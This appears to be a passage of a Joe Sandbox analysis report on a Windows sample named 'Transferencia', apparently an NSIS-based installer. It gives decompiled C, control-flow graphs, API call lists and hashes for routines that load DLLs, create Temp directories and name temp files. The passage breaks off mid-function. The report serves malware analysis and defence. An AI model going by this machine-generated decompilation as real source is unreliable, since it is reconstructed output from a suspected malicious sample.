                                                control_flow_graph 856 40557c-405591 857 405597-4055a8 856->857 858 405648-40564c 856->858 859 4055b3-4055bf lstrlenW 857->859 860 4055aa-4055ae call 406557 857->860 862 4055c1-4055d1 lstrlenW 859->862 863 4055dc-4055e0 859->863 860->859 862->858 866 4055d3-4055d7 lstrcatW 862->866 864 4055e2-4055e9 SetWindowTextW 863->864 865 4055ef-4055f3 863->865 864->865 867 4055f5-405637 SendMessageW * 3 865->867 868 405639-40563b 865->868 866->863 867->868 868->858 869 40563d-405640 868->869 869->858
                                                C-Code - Quality: 100%
                                                			E0040557C(signed int _a4, WCHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				WCHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				WCHAR* _t27;
                                                				signed int _t28;
                                                				long _t29;
                                                				signed int _t37;
                                                				signed int _t38;
                                                
                                                				_t27 =  *0x7a7a44;
                                                				_v8 = _t27;
                                                				if(_t27 != 0) {
                                                					_t37 =  *0x7a8b14;
                                                					_v12 = _t37;
                                                					_t38 = _t37 & 0x00000001;
                                                					if(_t38 == 0) {
                                                						E00406557(_t38, 0, 0x7a0f28, 0x7a0f28, _a4);
                                                					}
                                                					_t27 = lstrlenW(0x7a0f28);
                                                					_a4 = _t27;
                                                					if(_a8 == 0) {
                                                						L6:
                                                						if((_v12 & 0x00000004) == 0) {
                                                							_t27 = SetWindowTextW( *0x7a7a28, 0x7a0f28); // executed
                                                						}
                                                						if((_v12 & 0x00000002) == 0) {
                                                							_v32 = 0x7a0f28;
                                                							_v52 = 1;
                                                							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                                							_v44 = 0;
                                                							_v48 = _t29 - _t38;
                                                							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                                							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                                						}
                                                						if(_t38 != 0) {
                                                							_t28 = _a4;
                                                							0x7a0f28[_t28] = 0;
                                                							return _t28;
                                                						}
                                                					} else {
                                                						_t27 = lstrlenW(_a8) + _a4;
                                                						if(_t27 < 0x1000) {
                                                							_t27 = lstrcatW(0x7a0f28, _a8);
                                                							goto L6;
                                                						}
                                                					}
                                                				}
                                                				return _t27;
                                                			}

















                                                0x00405582
                                                0x0040558c
                                                0x00405591
                                                0x00405597
                                                0x004055a2
                                                0x004055a5
                                                0x004055a8
                                                0x004055ae
                                                0x004055ae
                                                0x004055b4
                                                0x004055bc
                                                0x004055bf
                                                0x004055dc
                                                0x004055e0
                                                0x004055e9
                                                0x004055e9
                                                0x004055f3
                                                0x004055fc
                                                0x00405608
                                                0x0040560f
                                                0x00405613
                                                0x00405616
                                                0x00405629
                                                0x00405637
                                                0x00405637
                                                0x0040563b
                                                0x0040563d
                                                0x00405640
                                                0x00000000
                                                0x00405640
                                                0x004055c1
                                                0x004055c9
                                                0x004055d1
                                                0x004055d7
                                                0x00000000
                                                0x004055d7
                                                0x004055d1
                                                0x004055bf
                                                0x0040564c

                                                APIs
                                                • lstrlenW.KERNEL32(007A0F28,00000000,0079F570,76CDEA30,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                                                • lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079F570,76CDEA30,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                                                • lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                                                • SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                                                  • Part of subcall function 00406557: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                                                  • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                • String ID:
                                                • API String ID: 1495540970-0
                                                • Opcode ID: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
                                                • Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
                                                • Opcode Fuzzy Hash: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
                                                • Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 870 406877-406897 GetSystemDirectoryW 871 406899 870->871 872 40689b-40689d 870->872 871->872 873 4068ae-4068b0 872->873 874 40689f-4068a8 872->874 876 4068b1-4068e4 wsprintfW LoadLibraryExW 873->876 874->873 875 4068aa-4068ac 874->875 875->876
                                                C-Code - Quality: 100%
                                                			E00406877(intOrPtr _a4) {
                                                				short _v576;
                                                				signed int _t13;
                                                				struct HINSTANCE__* _t17;
                                                				signed int _t19;
                                                				void* _t24;
                                                
                                                				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                				if(_t13 > 0x104) {
                                                					_t13 = 0;
                                                				}
                                                				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                					_t19 = 1;
                                                				} else {
                                                					_t19 = 0;
                                                				}
                                                				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                				return _t17;
                                                			}








                                                0x0040688e
                                                0x00406897
                                                0x00406899
                                                0x00406899
                                                0x0040689d
                                                0x004068b0
                                                0x004068aa
                                                0x004068aa
                                                0x004068aa
                                                0x004068c9
                                                0x004068dd
                                                0x004068e4

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
                                                • wsprintfW.USER32 ref: 004068C9
                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                • Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 877 405a4b-405a96 CreateDirectoryW 878 405a98-405a9a 877->878 879 405a9c-405aa9 GetLastError 877->879 880 405ac3-405ac5 878->880 879->880 881 405aab-405abf SetFileSecurityW 879->881 881->878 882 405ac1 GetLastError 881->882 882->880
                                                C-Code - Quality: 100%
                                                			E00405A4B(WCHAR* _a4) {
                                                				struct _SECURITY_ATTRIBUTES _v16;
                                                				struct _SECURITY_DESCRIPTOR _v36;
                                                				int _t22;
                                                				long _t23;
                                                
                                                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                				_v36.Owner = 0x4083f8;
                                                				_v36.Group = 0x4083f8;
                                                				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                				_v16.lpSecurityDescriptor =  &_v36;
                                                				_v36.Revision = 1;
                                                				_v36.Control = 4;
                                                				_v36.Dacl = 0x4083e8;
                                                				_v16.nLength = 0xc;
                                                				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                				if(_t22 != 0) {
                                                					L1:
                                                					return 0;
                                                				}
                                                				_t23 = GetLastError();
                                                				if(_t23 == 0xb7) {
                                                					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                						goto L1;
                                                					}
                                                					return GetLastError();
                                                				}
                                                				return _t23;
                                                			}







                                                0x00405a56
                                                0x00405a5a
                                                0x00405a5d
                                                0x00405a63
                                                0x00405a67
                                                0x00405a6b
                                                0x00405a73
                                                0x00405a7a
                                                0x00405a80
                                                0x00405a87
                                                0x00405a8e
                                                0x00405a96
                                                0x00405a98
                                                0x00000000
                                                0x00405a98
                                                0x00405aa2
                                                0x00405aa9
                                                0x00405abf
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405ac1
                                                0x00405ac5

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                                                • GetLastError.KERNEL32 ref: 00405AA2
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AB7
                                                • GetLastError.KERNEL32 ref: 00405AC1
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A71
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 3449924974-3081826266
                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction ID: 6b4cde1861b350949670c47dbaa51c368922036badf300449d23a0f4a4187d7a
                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                • Instruction Fuzzy Hash: D0010871D10219EADF109BA0C984BEFBFB4EB04314F04853AD545B6180D77896488FA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 883 732a1817-732a1856 call 732a1bff 887 732a185c-732a1860 883->887 888 732a1976-732a1978 883->888 889 732a1869-732a1876 call 732a2480 887->889 890 732a1862-732a1868 call 732a243e 887->890 895 732a1878-732a187d 889->895 896 732a18a6-732a18ad 889->896 890->889 899 732a1898-732a189b 895->899 900 732a187f-732a1880 895->900 897 732a18af-732a18cb call 732a2655 call 732a1654 call 732a1312 GlobalFree 896->897 898 732a18cd-732a18d1 896->898 921 732a1925-732a1929 897->921 904 732a191e-732a1924 call 732a2655 898->904 905 732a18d3-732a191c call 732a1666 call 732a2655 898->905 899->896 906 732a189d-732a189e call 732a2e23 899->906 902 732a1888-732a1889 call 732a2b98 900->902 903 732a1882-732a1883 900->903 917 732a188e 902->917 909 732a1890-732a1896 call 732a2810 903->909 910 732a1885-732a1886 903->910 904->921 905->921 914 732a18a3 906->914 920 732a18a5 909->920 910->896 910->902 914->920 917->914 920->896 925 732a192b-732a1939 call 732a2618 921->925 926 732a1966-732a196d 921->926 933 732a193b-732a193e 925->933 934 732a1951-732a1958 925->934 926->888 931 732a196f-732a1970 GlobalFree 926->931 931->888 933->934 935 732a1940-732a1948 933->935 934->926 936 732a195a-732a1965 call 732a15dd 934->936 935->934 937 732a194a-732a194b FreeLibrary 935->937 936->926 937->934
                                                C-Code - Quality: 88%
                                                			E732A1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void _v36;
                                                				char _v136;
                                                				struct HINSTANCE__* _t37;
                                                				void* _t39;
                                                				intOrPtr _t42;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t50;
                                                				void* _t54;
                                                				intOrPtr _t57;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t72;
                                                				void* _t76;
                                                
                                                				_t76 = __esi;
                                                				_t68 = __edi;
                                                				_t67 = __edx;
                                                				 *0x732a506c = _a8;
                                                				 *0x732a5070 = _a16;
                                                				 *0x732a5074 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x732a5048, E732A1651);
                                                				_push(1); // executed
                                                				_t37 = E732A1BFF(); // executed
                                                				_t54 = _t37;
                                                				if(_t54 == 0) {
                                                					L28:
                                                					return _t37;
                                                				} else {
                                                					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                						E732A243E(_t54);
                                                					}
                                                					_push(_t54);
                                                					E732A2480(_t67);
                                                					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                					if(_t57 == 0xffffffff) {
                                                						L14:
                                                						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                								_push(_t54);
                                                								_t37 = E732A2655();
                                                							} else {
                                                								_push(_t76);
                                                								_push(_t68);
                                                								_t61 = 8;
                                                								_t13 = _t54 + 0x1018; // 0x1018
                                                								memcpy( &_v36, _t13, _t61 << 2);
                                                								_t42 = E732A1666(_t54,  &_v136);
                                                								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                								_t18 = _t54 + 0x1018; // 0x1018
                                                								_t72 = _t18;
                                                								_push(_t54);
                                                								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                								 *_t72 = 4;
                                                								E732A2655();
                                                								_t63 = 8;
                                                								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                							}
                                                						} else {
                                                							_push(_t54);
                                                							E732A2655();
                                                							_t37 = GlobalFree(E732A1312(E732A1654(_t54)));
                                                						}
                                                						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                							_t37 = E732A2618(_t54);
                                                							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                								_t37 =  *(_t54 + 0x1008);
                                                								if(_t37 != 0) {
                                                									_t37 = FreeLibrary(_t37);
                                                								}
                                                							}
                                                							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                								_t37 = E732A15DD( *0x732a5068);
                                                							}
                                                						}
                                                						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                							goto L28;
                                                						} else {
                                                							_t39 = GlobalFree(_t54); // executed
                                                							return _t39;
                                                						}
                                                					}
                                                					_t48 =  *_t54;
                                                					if(_t48 == 0) {
                                                						if(_t57 != 1) {
                                                							goto L14;
                                                						}
                                                						E732A2E23(_t54);
                                                						L12:
                                                						_t54 = _t48;
                                                						L13:
                                                						goto L14;
                                                					}
                                                					_t49 = _t48 - 1;
                                                					if(_t49 == 0) {
                                                						L8:
                                                						_t48 = E732A2B98(_t57, _t54); // executed
                                                						goto L12;
                                                					}
                                                					_t50 = _t49 - 1;
                                                					if(_t50 == 0) {
                                                						E732A2810(_t54);
                                                						goto L13;
                                                					}
                                                					if(_t50 != 1) {
                                                						goto L14;
                                                					}
                                                					goto L8;
                                                				}
                                                			}



















                                                0x732a1817
                                                0x732a1817
                                                0x732a1817
                                                0x732a1824
                                                0x732a182c
                                                0x732a1839
                                                0x732a1847
                                                0x732a184a
                                                0x732a184c
                                                0x732a1851
                                                0x732a1856
                                                0x732a1978
                                                0x732a1978
                                                0x732a185c
                                                0x732a1860
                                                0x732a1863
                                                0x732a1868
                                                0x732a1869
                                                0x732a186a
                                                0x732a1870
                                                0x732a1876
                                                0x732a18a6
                                                0x732a18ad
                                                0x732a18d1
                                                0x732a191e
                                                0x732a191f
                                                0x732a18d3
                                                0x732a18d3
                                                0x732a18d4
                                                0x732a18dd
                                                0x732a18de
                                                0x732a18e8
                                                0x732a18eb
                                                0x732a18f0
                                                0x732a18f7
                                                0x732a18f7
                                                0x732a18fd
                                                0x732a18fe
                                                0x732a1904
                                                0x732a190a
                                                0x732a1917
                                                0x732a1918
                                                0x732a191b
                                                0x732a18af
                                                0x732a18af
                                                0x732a18b0
                                                0x732a18c5
                                                0x732a18c5
                                                0x732a1929
                                                0x732a192c
                                                0x732a1939
                                                0x732a1940
                                                0x732a1948
                                                0x732a194b
                                                0x732a194b
                                                0x732a1948
                                                0x732a1958
                                                0x732a1960
                                                0x732a1965
                                                0x732a1958
                                                0x732a196d
                                                0x00000000
                                                0x732a196f
                                                0x732a1970
                                                0x00000000
                                                0x732a1970
                                                0x732a196d
                                                0x732a187a
                                                0x732a187d
                                                0x732a189b
                                                0x00000000
                                                0x00000000
                                                0x732a189e
                                                0x732a18a3
                                                0x732a18a3
                                                0x732a18a5
                                                0x00000000
                                                0x732a18a5
                                                0x732a187f
                                                0x732a1880
                                                0x732a1888
                                                0x732a1889
                                                0x00000000
                                                0x732a1889
                                                0x732a1882
                                                0x732a1883
                                                0x732a1891
                                                0x00000000
                                                0x732a1891
                                                0x732a1886
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1886

                                                APIs
                                                  • Part of subcall function 732A1BFF: GlobalFree.KERNEL32 ref: 732A1E74
                                                  • Part of subcall function 732A1BFF: GlobalFree.KERNEL32 ref: 732A1E79
                                                  • Part of subcall function 732A1BFF: GlobalFree.KERNEL32 ref: 732A1E7E
                                                • GlobalFree.KERNEL32 ref: 732A18C5
                                                • FreeLibrary.KERNEL32(?), ref: 732A194B
                                                • GlobalFree.KERNEL32 ref: 732A1970
                                                  • Part of subcall function 732A243E: GlobalAlloc.KERNEL32(00000040,?), ref: 732A246F
                                                  • Part of subcall function 732A2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,732A1896,00000000), ref: 732A28E0
                                                  • Part of subcall function 732A1666: wsprintfW.USER32 ref: 732A1694
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.756317960.00000000732A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732A0000, based on PE: true
                                                • Associated: 00000000.00000002.756311352.00000000732A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756329828.00000000732A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756338430.00000000732A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_732a0000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277
                                                • Opcode ID: 325b81e355114694e649d33d76a76816ecc7dd48f82e2e1925eb52604c4b1e31
                                                • Instruction ID: 925aacf5b1ab6826760b64d2e0f415da110e79ba4a2762eec26522e9e52d84c4
                                                • Opcode Fuzzy Hash: 325b81e355114694e649d33d76a76816ecc7dd48f82e2e1925eb52604c4b1e31
                                                • Instruction Fuzzy Hash: D341A771A043469BEB019F6CD988B9537ACAF04370F188465ED4BAA1C6DBB8E0C4D760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 940 406039-406045 941 406046-40607a GetTickCount GetTempFileNameW 940->941 942 406089-40608b 941->942 943 40607c-40607e 941->943 945 406083-406086 942->945 943->941 944 406080 943->944 944->945
                                                C-Code - Quality: 100%
                                                			E00406039(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                				intOrPtr _v8;
                                                				short _v12;
                                                				short _t12;
                                                				intOrPtr _t13;
                                                				signed int _t14;
                                                				WCHAR* _t17;
                                                				signed int _t19;
                                                				signed short _t23;
                                                				WCHAR* _t26;
                                                
                                                				_t26 = _a4;
                                                				_t23 = 0x64;
                                                				while(1) {
                                                					_t12 =  *L"nsa"; // 0x73006e
                                                					_t23 = _t23 - 1;
                                                					_v12 = _t12;
                                                					_t13 =  *0x40a57c; // 0x61
                                                					_v8 = _t13;
                                                					_t14 = GetTickCount();
                                                					_t19 = 0x1a;
                                                					_v8 = _v8 + _t14 % _t19;
                                                					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                					if(_t17 != 0) {
                                                						break;
                                                					}
                                                					if(_t23 != 0) {
                                                						continue;
                                                					} else {
                                                						 *_t26 =  *_t26 & _t23;
                                                					}
                                                					L4:
                                                					return _t17;
                                                				}
                                                				_t17 = _t26;
                                                				goto L4;
                                                			}












                                                0x0040603f
                                                0x00406045
                                                0x00406046
                                                0x00406046
                                                0x0040604b
                                                0x0040604c
                                                0x0040604f
                                                0x00406054
                                                0x00406057
                                                0x00406061
                                                0x0040606e
                                                0x00406072
                                                0x0040607a
                                                0x00000000
                                                0x00000000
                                                0x0040607e
                                                0x00000000
                                                0x00406080
                                                0x00406080
                                                0x00406080
                                                0x00406083
                                                0x00406086
                                                0x00406086
                                                0x00406089
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00406057
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406072
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-678247507
                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 950 4020d8-4020e4 951 4021a3-4021a5 950->951 952 4020ea-402100 call 402da6 * 2 950->952 953 4022f1-4022f6 call 401423 951->953 963 402110-40211f LoadLibraryExW 952->963 964 402102-40210e GetModuleHandleW 952->964 960 402c2a-402c39 953->960 961 40292e-402935 953->961 961->960 966 402121-402130 call 406956 963->966 967 40219c-40219e 963->967 964->963 964->966 970 402132-402138 966->970 971 40216b-402170 call 40557c 966->971 967->953 973 402151-402164 call 732a1817 970->973 974 40213a-402146 call 401423 970->974 975 402175-402178 971->975 977 402166-402169 973->977 974->975 984 402148-40214f 974->984 975->960 978 40217e-402188 call 403b69 975->978 977->975 978->960 983 40218e-402197 FreeLibrary 978->983 983->960 984->975
                                                C-Code - Quality: 60%
                                                			E004020D8(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t23;
                                                				struct HINSTANCE__* _t31;
                                                				void* _t32;
                                                				WCHAR* _t35;
                                                				intOrPtr* _t36;
                                                				void* _t37;
                                                				void* _t39;
                                                
                                                				_t32 = __ebx;
                                                				asm("sbb eax, 0x7a8b20");
                                                				 *(_t39 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L15:
                                                					E00401423();
                                                					L16:
                                                					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
                                                					return 0;
                                                				}
                                                				_t35 = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                					L3:
                                                					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                					_t47 = _t23 - _t32;
                                                					 *(_t39 + 8) = _t23;
                                                					if(_t23 == _t32) {
                                                						_push(0xfffffff6);
                                                						goto L15;
